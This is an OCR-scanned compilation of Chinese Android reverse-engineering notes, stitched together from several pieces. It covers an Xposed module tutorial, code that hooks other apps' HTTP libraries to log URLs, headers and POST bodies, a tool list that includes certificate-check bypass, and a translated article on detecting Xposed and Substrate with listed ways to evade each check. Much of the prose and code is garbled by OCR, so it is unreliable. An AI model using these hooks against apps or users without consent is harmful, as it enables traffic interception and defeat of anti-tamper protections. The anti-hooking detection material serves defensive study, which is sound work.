ref 到 ndk 和 osx 的 头 文 件 中 导致 编译 失败 .解决 办 法 下 加 入 了 include: 


android-ndk-r10d/platforms/android-17/arch-arm/usr/include/sys 


Android Studio 1.3 已 经 开始 支持 NDK, 9544 4- eclipse 的 时 日 即将 到 来 . 
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原文 by RZA 
官方 教程 : https://github.com/rovo89/XposedBridge/wiki/Development-tutorial 


官网 : http://repo.xposed.info/module/de.robv.android.xposed. installer 
apk: http://dl-xda.xposed.info/modules/de.robv.android.xposed.installer v33 36570c.apk 


源码 : https://github.com/rovo89/Xposedinstaller 


ak >.> 
模块 基本 开发 流程 
1. 创建 工程 android4.0.3(api15, 测 试 发 现 其 他 版 本 也 可 以 ), 可 以 不 用 activity 


2. 修改 AndroidManifest.xml 


<?xml version="1.0" encoding="utf-8"?> 
<manifest xmlns:android="http://schemas.android.com/apk/res/android" 
package="de.robv.android. xposed.mods.tutorial" 
android: versionCode="1" 

android: versionName="1.0" > 

<uses-sdk android:minSdkVersion="15" /> 
<application 

android: icon="@drawable/ic_launcher" 

android: label="@string/app_name" > 

<meta-data 

android:name="xposedmodule" 
android:value="true" /> 

<meta-data 

android:name="xposeddescription" 

android: value="Easy example" /> 

<meta-data 

android:name="xposedminversion" 

android: value="54" /> 

</application> 

</manifest> 


3. 在 工程 目录 下 新 建 一 个 lib 文 件 夹 ,将 下 载 好 的 XposedBridgeApi-54.jar 包 放 入 其 中 . 
eclipse 在 工程 里 选中 XposedBridgeApi-54.jar 右键 -Build Path—Add to Build Path. 


IDEA 鼠标 右键 点 击 工程 ,选择 Open Module Settings, 在 弹出 的 窗口 中 打开 Dependencies 选 项 
卡 .把 XposedBridgeApi 这 个 jar 包 后 面 的 Scope 属 性 改 成 provided. 


1. 模块 实现 接口 
"" java package de.robv.android.xposed.mods.tutorial; 


import de.robv.android.xposed.IXposedHookLoadPackage; import 
de.robv.android.xposed.XposedBridge; import 
de.robv.android.xposed.callbacks.XC LoadPackage.LoadPackageParam; 


public class Tutorial implements IXposedHookLoadPackage ( public void 
handleLoadPackage(final LoadPackageParam lpparam) throws Throwable { 
XposedBridge.log("Loaded app: " + Ipparam.packageName); } ) 


5. 入 口 assets/xposed_init 配 置 ,声明 需要 加 载 到 XposedInstaller 的 入 口 类 : 


^de.robv.android.xposed.mods.tutorial.Tutorial' // 完 整 类 名 : 包 名 + 类 名 
6. 定位 要 hook 的 api 


反 编译 目标 程序 ,查看 Smali 代 码 
直接 在 AOSP(android 源 码 ) 中 查看 


7. XposedBridge to hook it 


指定 要 hook 4&4 
判断 当前 加 载 的 包 是 否 是 指定 的 包 
指定 要 hook 的 方法 名 
实现 beforeHookedMethod 方 法 和 afterHookedMethod 方 法 
示例 如 下 : 
` java 
package de.robv.android.xposed.mods. tutorial; 


import static de.robv.android.xposed.XposedHelpers.findAndHookMethod; import de.robv.a 
ndroid.xposed.IXposedHookLoadPackage; import de.robv.android.xposed.XCN MethodHook; im 
port de.robv.android.xposed.callbacks.XCN LoadPackage.LoadPackageParam; 


public class Tutorial implements IXposedHookLoadPackage { public void handleLoadPackag 
e(final LoadPackageParam lpparam) throws Throwable { if (!lpparam.packageName.equals(" 
com.android.systemui")) return; 


findAndHookMethod("com.android.systemui.statusbar.policy.Clock", lpparam.classLoader, 
"updateClock", new XC MethodHook() { 
@Override 
protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 
// this will be called before the clock was updated by the original method 
} 


@Override 


protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
// this will be called after the clock was updated by the original method 


重 写 XC_MethodHook 的 两 个 方法 beforeHookedMethod 和 afterHookedMethod， 这 两 个 方法 
会 在 原始 的 方法 的 之 前 和 之 后 执行 .您 可 以 使 用 beforeHookedMethod 7 7X & 4T Fp/ E AA KH 
用 的 参数 (通过 param.args) ,甚至 阻止 调用 原来 的 方法 (发 送 自己 的 结 

果 ) .afterHookedMethod 方法 可 以 用 来 做 基于 原始 方法 的 结果 的 事情 .您 还 可 以 用 它 来 操纵 结 
果 .当然 ， 你 可 以 添加 自己 的 代码 , 它 将 会 准确 地 在 原始 方法 的 前 或 后 执行 . 


关键 API 
IXposedHookLoadPackage 
handleLoadPackage : 这 个 方法 用 于 在 加 载 应 用 程序 的 包 的 时 候 执行 用 户 的 操作 


调用 示例 


public class XposedInterface implements IXposedHookLoadPackage { 
public void handleLoadPackage(final LoadPackageParam lpparam) throws Throwable { 
XposedBridge.log("Kevin-Loaded app: " + lpparam.packageName); } 


} 


Qui. 


参数 说 明 |final LoadPackageParam lpparam 这 个 参数 包含 了 加 载 的 应 用 程序 的 一 些 基 本 信 


XposedHelpers 
findAndHookMethod ;这 是 一 个 辅助 方法 ,可 以 通过 如 下 方式 静态 导入 : 


import static de.robv.android.xposed.XposedHelpers.findAndHookMethod; 


使 用 示例 


findAndHookMethod("com.android.systemui.statusbar.policy.Clock", lpparam.classLoader, 
"handleUpdateClock", new XC MethodHook() { 

@Override 

protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 

// this will be called before the clock was updated by the original method } 


@Override 
protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
// this will be called after the clock was updated by the original method } 


3) 


参数 说 明 
findAndHookMethod(Class<?>clazz, /需要 Hook 的 类 名 ClassLoader, // 类 加 载 器 ,可 以 设置 为 


null String methodName, /需要 Hook 的 方法 名 Object... parameterTypesAndCallback 该 函 
数 的 最 后 一 个 参数 集 , 包 含 了 : 


(1)Hook 的 目标 方法 的 参数 , 璧 如 : 
"com.android.internal.policy.impl.PhoneWindow.DecorView" 
是 方法 的 参数 的 类 。 

(2) 回 调 方法 : 


a.XC_MethodHook 
b.XC_MethodReplacement 


模块 开发 中 的 一 些 细节 


1. Dalvik &£46 3$ Zygote (Android 系 统 中 ， 所 有 的 应 用 程序 进程 以 及 系统 服务 进程 
SystemServer 都 是 由 Zygote 进 程 孕育 /fork 出 来 的 ) 进 程 对 应 的 程序 
是 /system/bin/app_process. Xposed 框架 中 巾 正 起 作用 的 是 对 方法 的 hook © 
为 Xposed 工作 原理 是 在 /system/bin 目录 下 替换 文件 ,在 install 的 时 候 需 要 root AMR, 
但 是 运行 时 不 需要 root 权限 。 


2. log 统一 管理 ,tag 显示 包 名 
Log.d(MYTAG+lpparam.packageName, "hello" + lpparam.packageName) ; 


3. 植 入 广播 接收 器 ,动态 执行 指令 


findAndHookMethod("android.app.Application", lpparam.classLoader, "onCreate", new XC_M 
ethodHook() { 

@Override 

protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 


Context context = (Context) param.thisObject; 
IntentFilter filter = new IntentFilter(myCast.myAction) ; 
filter.addAction(myCast.myCmd); 
context.registerReceiver(new myCast(), filter); 


} 


@Override 
protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
super .afterHookedMethod(param) ; 


} 
3); 


1. context 获取 


fristApplication - (Application) param.thisObject; 


1. 注入 点 选择 application oncreate 42/7 5 EÈ ab Zi Æ MainActivity 的 onCreate (该 类 
有 可 能 被 重 写 ,所 以 通过 反射 得 到 oncreate 方法 ) 


String appClassName = this.getAppInfo().className; 
if (appClassName == null) { 
Method hookOncreateMethod = null; 


try { 
hookOncreateMethod = Application.class.getDeclaredMethod("onCreate", new Class[] { 
}); 


} catch (NoSuchMethodException e) { 
e.printStackTrace(); 
} 


hookhelper.hookMethod(hookOncreateMethod, new ApplicationOnCreateHook()); 


1. 排除 系统 app, 排 除 自 身 , 确 定 主线 程 


if(lpparam.appInfo == null || 
(lpparam.appInfo.flags & (ApplicationInfo.FLAG SYSTEM | ApplicationInfo.FLAG_UPDAT 
ED SYSTEM APP)) !=0){ 
return; 
jelse if(lpparam.isFirstApplication && !ZJDROID PACKAGENAME.equals(lpparam.packageName 


)){ 


1. hook method Only methods and constructors can be hooked, Cannot hook 
interfaces,Cannot hook abstract methods 
只 能 hook 方法 和 构造 方法 ,不 能 hook 接口 和 抽象 方法 
抽象 类 中 的 非 抽 象 方法 是 可 以 hook 的 , 接口 中 的 方法 不 能 hook (接口 中 的 method 默 认 是 
public abstract 抽象 的 .field 必须 是 public static final) 


2. 参数 中 有 自 定 义 类 public void myMethod (String a, MyClass b) 通过 反射 得 到 自 定 义 类 ， 
也 可 以 用 xposedhelpers 封装 好 的 方法 findMethod/findConstructor/callStaticMethod...…. 


3. 注入 后 反射 自 定义 类 


Class<?> hookMessageListenerClass = null; 


hookMessageListenerClass = lpparam.classLoader.loadClass("org.jivesoftware.smack.Messa 
geListener"); 


findAndHookMethod("org.jivesoftware.smack.ChatManager", lpparam.classLoader, "createCh 
at", String.class , hookMessageListenerClass ,new XC MethodHook() { 

@Override 

protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 


String sendTo = (String) param.args[0]; 
Log.i(tag , "sendTo : + " + sendTo ); 


} 


@Override 

protected void afterHookedMethod(MethodHookParam param) throws Throwable { 
super.afterHookedMethod(param) ; 

} 


}); 


1. hook 一 个 类 的 方法 ,该 类 是 子 类 并 且 没 有 重 写 父 类 的 方法 ,此 时 应 该 hook 父 类 还 是 子 类 . 
(hook 父 类 方法 后 , 子 类 若 没 重 写 ,一 样 生效 . 子 类 重 写 方法 需要 另外 hook) (如 果子 类 重 写 
父 类 方法 时 候 加 上 spuer ,hook 5C A ikw Æ 2) 例如 java.net.HttpURLConnection 
extends URLConnection 


public OutputStream getOutputStream() throws IOException { 
throw new UnknownServiceException("protocol doesn't support output"); 


org.apache.http.impl.client.AbstractHttpClient extends CloseableHttpClient , 
方法 在 父 类 (注意 ,android 的 继承 的 AbstractHttpClient implements org.apache.http.client.HttpC 
lient) 


public CloseableHttpResponse execute( 

final HttpHost target, 

final HttpRequest request, 

final HttpContext context) throws IOException, ClientProtocolException { 
return doExecute(target, request, context); 


} 


android.async.http 复 写 HttpGet 寻 致 zjdroid hook org.apache.http.impl.client.AbstractHttpCl 
ient execute 无 法 获取 到 请 求 
url 和 method 


1. hook 构造 方法 


public static XC_MethodHook.Unhook findAndHookConstructor(String className, ClassLoade 
r classLoader, Object... eee A { 

return findAndHookConstructor (findClass(className, classLoader), parameterTypesAndCall 
back); 


} 


1. 承接 4,application 的 onCreate 方法 被 重 写 ,例如 阿里 的 过 , 重 写 为 原生 native 方法 . 
解 1: 通 过 反射 到 application 类 重 写 后 的 onCreate 方法 再 对 该 方法 进行 hook 
解 2:hook 构造 方法 (构造 方法 被 重 写 ,继续 解 1) 


2. native 方法 可 以 hook, 不 过 是 在 java 层 调用 时 hook 而 不 是 hook 动态 链接 库 . 


实战 Hook android 中 可 能 的 出 现 HTTP 请 求 


首先 确定 http 请 求 的 api, 大 致 分 为 : 


e apache 提供 的 HttpClient 1) 创建 HttpClient 以 及 GetMethod / PostMethod ， 
HttpRequest 等 对 象 ; 2) 设置 连接 参数 ; 3) 执行 HTTP 操作 ; 4) 处 理 服务 器 返回 结果 . 

e java 提供 的 HttpURLConnection 1) 创建 URL 以 及 URLConnection / 
HttpURLConnection xi € 2) 设置 连接 参数 3) 连接 到 服务 器 4) 向 服务 器 写 数据 5) 从 服务 
器 读 取 数据 

e android 提供 的 webview 

e 第 三 方 库 :volley/android-async-http/xutils (本 质 是 对 前 两 种 的 方式 的 延伸 ,方法 的 重 写 可 能 
对 接 下 来 的 hook 产生 影响 ) 不 太 了 解 java 的 hook 前 可 以 先 看 下 基础 的 代码 。 

对 HttpClient 的 hook 可 以 参考 E&F K+ A9Zjdroid `` java Method executeRequest = 
Reflnvoke.findMethodExact("org.apache.http.impl.client.AbstractHttpClient ， 
ClassLoader.getSystemClassLoader(), "execute", HttpHost.class, HttpRequest.class, 
HttpContext.class); 


hookhelper.hookMethod(executeRequest, new AbstractBahaviorHookCallBack() ( 
@Override public void descParam(HookParam param) ( // TODO Auto-generated method 
stub Logger.log behavior("Apache Connect to URL ->"); HttpHost host = (HttpHost) 
param.args[0]; 


HttpRequest request - (HttpRequest) param.args[1]; 
if (request instanceof org.apache.http.client.methods.HttpGet) { 

org.apache.http.client.methods.HttpGet httpGet = (org.apache.http.client.methods.H 
ttpGet) request; 

Logger.log_behavior("HTTP Method : " + httpGet.getMethod()); 

Logger.log_behavior("HTTP GET URL : " + httpGet.getURI().toString()); 

Header[] headers = request.getAllHeaders(); 

if (headers != null) { 

for (int i = 0; i < headers.length; i++) { 
Logger .log_behavior(headers[i].getName() + ":" + headers[i].getName()); 


} 
} else if (request instanceof HttpPost) { 
HttpPost httpPost = (HttpPost) request; 
Logger.log behavior("HTTP Method : " + httpPost.getMethod()); 


Logger.log_behavior("HTTP URL : " + httpPost.getURI().toString()); 
Header[] headers = request.getAllHeaders(); 
if (headers != null) { 
for (int i = 0; i < headers.length; i++) { 
Logger .log_ behavior (headers[i].getName() + ":" + headers[i].getValue()); 
} 
} 


HttpEntity entity = httpPost.getEntity(); 
String contentType = null; 
if (entity.getContentType() != null) ( 
contentType = entity.getContentType().getValue(); 
if (URLEncodedUtils.CONTENT TYPE.equals(contentType)) { 


try { 
byte[] data = new byte[(int) entity.getContentLength()]; 


entity.getContent().read(data); 
String content - new String(data, HTTP.DEFAULT CONTENT CHARSET); 
Logger.log behavior("HTTP POST Content : " + content); 
) catch (IllegalStateException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
) catch (IOException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 


j 


) else if (contentType.startsWith(HTTP.DEFAULT CONTENT TYPE)) { 
try { 
byte[] data = new byte[(int) entity.getContentLength()]; 
entity.getContent().read(data); 
String content = new String(data, contentType.substring(contentType.la 
stIndexOf("z") + 1)); 
Logger.log behavior("HTTP POST Content : " + content); 
) catch (IllegalStateException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
) catch (IOException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 


} 
selsef{ 
byte[] data = new byte[(int) entity.getContentLength()]; 
try { 
entity.getContent().read(data); 
String content = new String(data, HTTP.DEFAULT CONTENT CHARSET); 
Logger.log behavior("HTTP POST Content : " + content); 
catch (IllegalStateException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
catch (IOException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 


(QOverride public void afterHookedMethod(HookParam param) ( // TODO Auto-generated 
method stub super.afterHookedMethod(param); HttpResponse resp - (HttpResponse) 
param.getResult(); if (resp != null) ( Logger.log behavior("Status Code = " + 


resp.getStatusLine().getStatusCode()); Header[] headers = resp.getAllHeaders(); if (headers 
!- null) ( for (int i = 0; i < headers.length; i++) { Logger.log behavior(headers[i].getName() + 
"" + headers[i].getValue()); ) ) 


}}); 


xt HttpURLConnection hook Zjdroid 未 能 提供 完美 的 解决 方案 , 想 要 取得 除了 URL 之 外 的 data 字段 
必须 对 I/0 流 操作 . 
"US java 
Method openConnectionMethod = RefInvoke.findMethodExact("java.net.URL", ClassLoader .ge 
tSystemClassLoader(), "openConnection"); 
hookhelper.hookMethod(openConnectionMethod, new AbstractBahaviorHookCallBack() { 
@Override 
public void descParam(HookParam param) { 
// TODO Auto-generated method stub 
URL url = (URL) param.thisObject; 
Logger.log_behavior("Connect to URL ->"); 
Logger .log_behavior("The URL = " + url.toString()); 
} 
}); 


我 采取 的 临时 解决 方法 是 对 MO 进行 正则 匹配 ,类 似 url 的 data 字段 就 打印 出 来 ,代码 如 下 (这 段 
代码 只 能 解决 前 文 HttpUtils 而 且 会 有 误 报 ,大 家 有 啥 好 想法 欢迎 指点 一 二 ) 


findAndHookMethod("java.io.PrintWriter", lpparam.classLoader, "print",String.class, new 
XC MethodHook() { 
@Override 
protected void beforeHookedMethod(MethodHookParam param) throws Throwable { 
String print = (String) param.args[0]; 
Pattern pattern = Pattern.compile("(\\w+=.*)"); 
Matcher matcher = pattern.matcher(print); 
if (matcher .matches()) 
Log.i(tag+lpparam.packageName, data : " + print); 
//lLOg.d( tag, vA =F print) 


} 

3); 
pm —————————Á— E) 
A Android-async-http € € J HttpGet +3 Zjdroidhook 失败 (未 进入 HttpGet 和 HttpPost 的 
判读 ), 加 入 一 个 else 语句 就 可 以 解决 这 个 问题 


else { 
HttpEntityEnclosingRequestBase httpGet = (HttpEntityEnclosingRequestBase) 


request; 
HttpEntity entity - httpGet.getEntity(); 
Logger.log behavior("HttpRequestBase URL : " + httpGet.getURI().toString() 
); 
Header[] headers = request.getAllHeaders(); 
if (headers != null) { 
for (int i = 0; i < headers.length; i++) { 
Logger .log_behavior(headers[i].getName() + ":" + headers[i].getNam 
e()); 
} 
j 
if(entity!= null){ 
try { 
String content = EntityUtils 
.toString(entity); 
Logger.log_behavior("HTTP entity Content : " 
+ content); 
} catch (IllegalStateException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
} catch (IOException e) { 
// TODO Auto-generated catch block 
e.printStackTrace(); 
} 
} 
} 
nS 
一 些 第 用 工具 


zjdroid: i, 7c /api t 3 

justTrustMe: 忽 略 证 书 效 验 
IntentMonitor: 可 以 监控 显 / 隐 意 图 intent 
Xinstaller: 设 置 应 用 /设备 属性 .… 
XPrivacy: 权 限 管 理 


原文 : http://d3adend.org/blog/?p=589 


0x00 3j à 


一 个 最 近 关 于 检测 native hook 框 架 的 方法 让 我 开始 思考 一 个 Android 应 用 如 何在 Java 层 检测 
Cydia Substrate 或 者 Xposed 框 架 。 


声明 : 


A sian te ei 以 被 有 经 验 的 逆向 人 员 绕 过 ， 这 里 只 是 展示 几 个 检测 
的 方法 。 在 最 近 DexGuard 和 GuardIT 等 工具 中 还 没有 这 类 anti-hooking 检 测 功 能 ， 不 过 我 相信 
不 久 就 会 增加 这 个 功能 。 


0x01 检测 安装 的 应 用 


一 个 最 直接 的 想法 就 是 检测 设备 上 有 没有 安装 Substrate 或 者 Xposed 框 架 ， 可 以 直接 调用 
PackageManager 显 示 所 有 安装 的 应 用 ， 然 后 看 是 否 安装 了 Substrate 或 者 Xposed 。 


PackageManager packageManager = context.getPackageManager (); 
List applicationInfoList = packageManager.getInstalledApplications(PackageManager .GET 
_META_DATA); 


for(ApplicationInfo applicationInfo : applicationInfoList) { 
if(applicationInfo.packageName.equals("de.robv.android.xposed.installer")) { 
Log.wtf("HookDetection", "Xposed found on the system."); 


if(applicationInfo.packageName.equals("com.saurik.substrate")) { 
Log.wtf("HookDetection", "Substrate found on the system."); 
} 


0x02 检查 调用 栈 里 的 可 疑 方 法 


另 一 个 想到 的 方法 是 检查 Java 调 用 栈 里 的 可 疑 方 法 ， 主 动 抛 出 一 个 异常 ， 然 后 打印 方法 的 调 
用 栈 。 代 码 如 下 


public class DoStuff { 
public static String getSecret() { 
enyi 
throw new Exception("blah"); 


catch(Exception e) { 
for(StackTraceElement stackTraceElement : e.getStackTrace()) { 
Log.wtf("HookDetection", stackTraceElement.getClassName() + "-»" + sta 
ckTraceElement.getMethodName()); 


j 


return "ChangeMePls!!!"; 


当 应 用 没有 被 hook 的 时 候 ， 正 常 的 调用 栈 是 这 样 的 : 


com.example.hookdetection.DoStuff->getSecret 
com.example.hookdetection.MainActivity->onCreate 
android.app.Activity->performCreate 
android.app.Instrumentation->callActivityOnCreate 
android.app.ActivityThread->performLaunchActivity 
android.app.ActivityThread->handleLaunchActivity 
android.app.ActivityThread ->access$800 
android.app.ActivityThread$H->handleMessage 
android.os.Handler-»dispatchMessage 
android.os.Looper->loop 
android.app.ActivityThread->main 
java.lang.reflect .Method->invokeNative 
java.lang.reflect .Method->invoke 
com.android.internal.os.ZygoteInit$MethodAndArgsCaller ->run 
com.android.internal.os.ZygoteInit-»main 
dalvik.system.NativeStart-»main 


但 是 假如 有 Xposed 框 架 hook 了 com.example.hookdetection.DoStuff.getSecret 方 法 ， 那 么 调 
用 栈 会 有 2 个 变化 : 


在 dalvik.system.NativeStart.main 方 法 后 出 现 de.robvandroid.xposed.XposedBridge.main 调 
用 

如 果 Xposed hook 了 调用 栈 里 的 一 个 方法 ， 还 会 有 
de.robvandroid.xposed.XposedBridge.handleHookedMethod 和 
de.robv.android.xposed.XposedBridge.invokeOriginalMethodNative 调 用 

所 以 如 果 hook 了 getSecret 方 法 ， 调 用 栈 就 会 如 下 : 


com.example.hookdetection.DoStuff->getSecret 


de.robv.android.xposed.XposedBridge->invokeOriginalMethodNative 
de.robv.android.xposed.XposedBridge--handleHookedMethod 


com.example.hookdetection.DoStuff-»getSecret 
com.example.hookdetection.MainActivity->onCreate 
android.app.Activity->performCreate 
android.app.Instrumentation->callActivityOnCreate 
android.app.ActivityThread->performLaunchActivity 
android.app.ActivityThread->handleLaunchActivity 
android.app.ActivityThread ->access$800 
android.app.ActivityThread$H--handleMessage 
android.os.Handler-»dispatchMessage 
android.os.Looper-»1loop 
android.app.ActivityThread->main 
java.lang.reflect .Method->invokeNative 
java.lang.reflect .Method->invoke 
com.android.internal.os.ZygoteInit$MethodAndArgsCaller->run 
com.android.internal.os.ZygoteInit ->main 


de.robv.android. xposed. XposedBridge->main 


dalvik.system.NativeStart->main 


T à F Substrate hook com.example.hookdetection.DoStuff.getSecret Zr >% > AARAA 
什么 变化 : 


dalvik.system.NativeStart.main 调 用 后 会 出 现 2 次 com.android.internal.os.Zygotelnit.main ;而 
不 是 一 次 。 

如 果 Substrate hook 了 调用 栈 里 的 一 个 方法 ， 还 会 出 现 com.saurik.substrate.MS$2.invoked > 
com.saurik.substrate.MS $MethodPointer.invoke 还 有 跟 Substrate 扩 展 相 关 的 方法 (这 里 是 
com.cigital.freak.Freak$1$1.invoked) 。 

所 以 如 果 hook 了 getSecret 方 法 ， 调 用 栈 就 会 如 下 : 


com.example.hookdetection.DoStuff->getSecret 


com.saurik.substrate._MS$MethodPointer ->invoke 
com.saurik.substrate.MS$MethodPointer ->invoke 
com.cigital.freak.Freak$1$1--invoked 
com.saurik.substrate.MS$2->invoked 


com.example.hookdetection.DoStuff->getSecret 
com.example.hookdetection.MainActivity->onCreate 
android.app.Activity->performCreate 
android.app.Instrumentation->callActivityOnCreate 
android.app.ActivityThread->performLaunchActivity 
android.app.ActivityThread->handleLaunchActivity 
android.app.ActivityThread ->access$800 
android.app.ActivityThread$H->handleMessage 
android.os.Handler-»dispatchMessage 
android.os.Looper-»1loop 
android.app.ActivityThread->main 
java.lang.reflect .Method->invokeNative 
java.lang.reflect .Method->invoke 
com.android.internal.os.ZygoteInit$MethodAndArgsCaller ->run 
com.android.internal.os.ZygoteInit ->main 


com.android.internal.os.ZygoteInit ->main 


dalvik.system.NativeStart->main 


在 知道 了 调用 栈 的 变化 之 后 ， 就 可 以 在 Java 层 写 代 码 进行 检测 : 


Enya 
throw new Exception("blah"); 


catch(Exception e) { 
int zygotelnitCallCount - 9; 
for(StackTraceElement stackTraceElement : e.getStackTrace()) ( 
if(stackTraceElement.getClassName().equals("com.android.internal.os.ZygoteInit" 
)) I 


zygoteInitCallCount++; 
if(zygoteInitCallCount == 2) { 
Log.wtf("HookDetection", "Substrate is active on the device."); 


if(stackTraceElement.getClassName().equals("com.saurik.substrate.MS$2") && 
stackTraceElement.getMethodName().equals("invoked")) { 
Log.wtf("HookDetection", "A method on the stack trace has been hooked usin 
g Substrate."); 


if(stackTraceElement.getClassName().equals("de.robv.android.xposed.XposedBridg 
e") && 
stackTraceElement.getMethodName().equals("main")) { 
Log.wtf("HookDetection", "Xposed is active on the device."); 


if(stackTraceElement.getClassName().equals("de.robv.android.xposed.XposedBridg 
e") && 
stackTraceElement.getMethodName().equals("handleHookedMethod")) ( 
Log.wtf("HookDetection", "A method on the stack trace has been hooked usin 
g Xposed."); 
} 


} 
J Se wj 


0x03 检测 并 不 应 该 native 的 native 方 法 


Xposed 框 架 会 把 hook 的 Java 方 法 类 型 改 为 "native"， 然 后 把 原来 的 方法 替换 成 自己 的 代码 
(调用 hookedMethodCallback) 。 可 以 查看 XposedBridge_hookMethodNative 的 实现 ， 是 修 
改 后 app_process 里 的 方法 。 


利用 Xposed 改 变 hook 方 法 的 这 个 特性 (Substrate 也 使 用 类 似 的 原理 ) ， 就 可 以 用 来 检测 是 否 
被 hook 了 。 注 意 这 不 能 用 来 检测 ART 运 行 时 的 Xposed， 因 为 没 必 要 把 方法 的 类 型 改 为 
native ° 


假设 有 下 面 这 个 方法 : 


public class DoStuff { 
public static: String getSecret() { 
return "ChangeMePls!!!"; 
} 


如 果 getSecret 方 法 被 hook 了 ， 在 运行 的 时 候 就 会 像 下 面 的 定义 : 


public class DoStuff { 
// calls hookedMethodCallback if hooked using Xposed 
public native static String getSecret(); 


基于 上 面 的 原理 ， 检 测 的 步骤 如 下 : 


定位 到 应 用 的 DEX 文 件 

枚 举 所 有 的 class 

通过 反射 机 制 判断 运行 时 不 应 该 是 native 的 方法 

下 面 的 Java 展 示 了 这 个 技巧 。 这 里 假设 了 应 用 本 身 没有 通过 JNI 调 用 本 地 代码 ， 大 多 数 应 用 都 
不 需要 调用 本 地 方法 。 不 过 如 果 有 JNI 调 用 的 话 ， 只 需要 把 这 些 native 方 法 添加 到 一 个 白 名 单 
中 即 可 。 理 论 上 这 个 方法 也 可 以 用 于 检测 Java 库 或 者 第 三 方 库 ， 不 过 需要 把 第 三 方 库 的 native 
方法 添加 到 一 个 白 名 单 。 检 测 代码 如 下 : 


for (ApplicationInfo applicationInfo : applicationInfoList) { 
if (applicationInfo.processName.equals("com.example.hookdetection")) ( 
Set classes - new HashSet(); 
DexFile dex; 
ty 
dex - new DexFile(applicationInfo.sourceDir); 
Enumeration entries - dex.entries(); 
while(entries.hasMoreElements()) { 
String entry - entries.nextElement(); 
classes.add(entry); 


dex.close(); 


catch (IOException e) { 
Log.e("HookDetection", e.toString()); 


for(String className : classes) { 
if(className.startsWith("com.example.hookdetection")) { 
try { 
Class clazz = HookDetection.class.forName(className) ; 

for(Method method : clazz.getDeclaredMethods()) { 

if(Modifier.isNative(method.getModifiers())){ 
Log.wtf("HookDetection", "Native function found (could be 
hooked by Substrate or Xposed): " + clazz.getCanonicalName() + "->" + method.getName( ) 


Ne 
} 
} 


catch(ClassNotFoundException e) { 
Log.wtf("HookDetection", e.toString()); 
} 


0x04 通过 /proc/[pid]/maps 检 测 可 疑 的 共享 对 象 或 者 
JAR 


/proc/[pidl/maps 记 录 了 内 存 映 射 的 区 域 和 访问 权限 ， 首 先 查看 Android 应 用 的 映像 ， 第 一 列 是 
起 始 地 址 和 结束 地 址 ， 第 六 列 是 映射 文件 的 路 径 。 





cat /proc/5584 


/maps 


40027000-4002c000 r-xp 00000000 103:06 2114 /system/bin/app_process 
4002c000-4002d000 r--p 00004000 103:06 2114 /system/bin/app process 
4002d000-4002e000 rw-p 00005000 103:06 2114 /system/bin/app process 
4002e000-4003d000 r-xp 00000000 103:06 246 /system/bin/linker 
4003d000-4003e000 r--p 0000e000 103:06 246 /system/bin/linker 
4003e000-4003f000 rw-p 0000f000 103:06 246 /system/bin/linker 


4003f000-40042000 rw-p 00000000 00:00 0 
40042000-40043000 r--p 00000000 00:00 0 
40043000-40044000 rw-p 00000000 00:00 0 


40044000-40047000 r-xp 00000000 103:06 1176 /system/lib/libNimsWrap.so 
40047000-40048000 r--p 00002000 103:06 1176 /system/lib/libNimsWrap.so 
40048000-40049000 rw-p 00003000 103:06 1176 /system/lib/libNimsWrap.so 
40049000-40091000 r-xp 00000000 103:06 1237 /system/lib/libc.so 


Lots of other memory regions here 


因此 可 以 写 代码 检测 加 载 到 当前 内 存 区 域 中 的 可 妖 文 件 : 


Ghy d 
Set libraries = new HashSet(); 
String mapsFilename = "/proc/" + android.os.Process.myPid() + "/maps"; 


BufferedReader reader = new BufferedReader (new FileReader(mapsFilename)); 
String line; 
while((line = reader.readLine()) != null) ( 
if (line.endsWith(".so") || line.endsWith(".jar")) { 
int n = line.lastIndexOf(" "); 
libraries.add(line.substring(n + 1)); 
} 
} 
for (String library : libraries) { 
if(library.contains("com.saurik.substrate")) { 
Log.wtf("HookDetection", "Substrate shared object found: " + library); 


if(library.contains("XposedBridge.jar")) { 
Log.wtf("HookDetection", "Xposed JAR found: " + library); 
} 
reader .close(); 


catch (Exception e) { 
Log.wtf("HookDetection", e.toString()); 
} 


Substrate 会 用 到 几 个 so : 


Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libAndroidBootstra 


pO.so 

Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libAndroidCydia.cy 
,SO 

Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libDalvikLoader.cy 
,SO 


Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libsubstrate.so 
Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libsubstrate-dvm.s 
o 

Substrate shared object found: /data/app-lib/com.saurik.substrate-1/libAndroidLoader.s 
o 


Xposed 会 用 到 一 个 Jar : 


Xposed JAR found: /data/data/de.robv.android.xposed.installer/bin/XposedBridge.jar 


0x05 绕 过 检测 的 方法 


上 面 讨论 了 几 个 anti-hooking 的 方法 ， 不 过 相信 也 会 有 人 提出 绕 过 的 方法 ， 这 里 对 应 每 个 检测 
方法 如 下 : 


hook PackageManager 的 getlnstalledApplications， 把 Xposed 或 者 Substrate 的 包 名 去 掉 
hook Exception getStackTrace > 4e Á C, 65 Zr ;k X 4$ 

hook getModifiers， 把 flag 改 成 看 起 来 不 是 native 

hook 打开 的 文件 的 操作 ， 返 回 /dev/null 或 者 修改 的 map 文 件 


Author: @ 爱 博 才 会 赢 


本 文 为 乌云 峰会 上 《Android 应 用 程序 通用 自动 脱 壳 方法 研究 》 的 扩展 延伸 版 。 


0x00 ARABS 


Android 应 用 程序 相 比 传统 PC 应 用 程序 更 容易 被 逆向 ， 因 为 被 逆向 后 能 够 完 cn :/$ ii Java 
RY 3, Asmali t AGS * 98S 3b AR RU AEG SH RAGUSA XE AEG 29 2p HERR 
辑 轻 多 暴露 给 技术 能 力 甚至 并 不 需要 很 高 门槛 的 攻击 者 面前 。 因 此 Android 应 MEE 
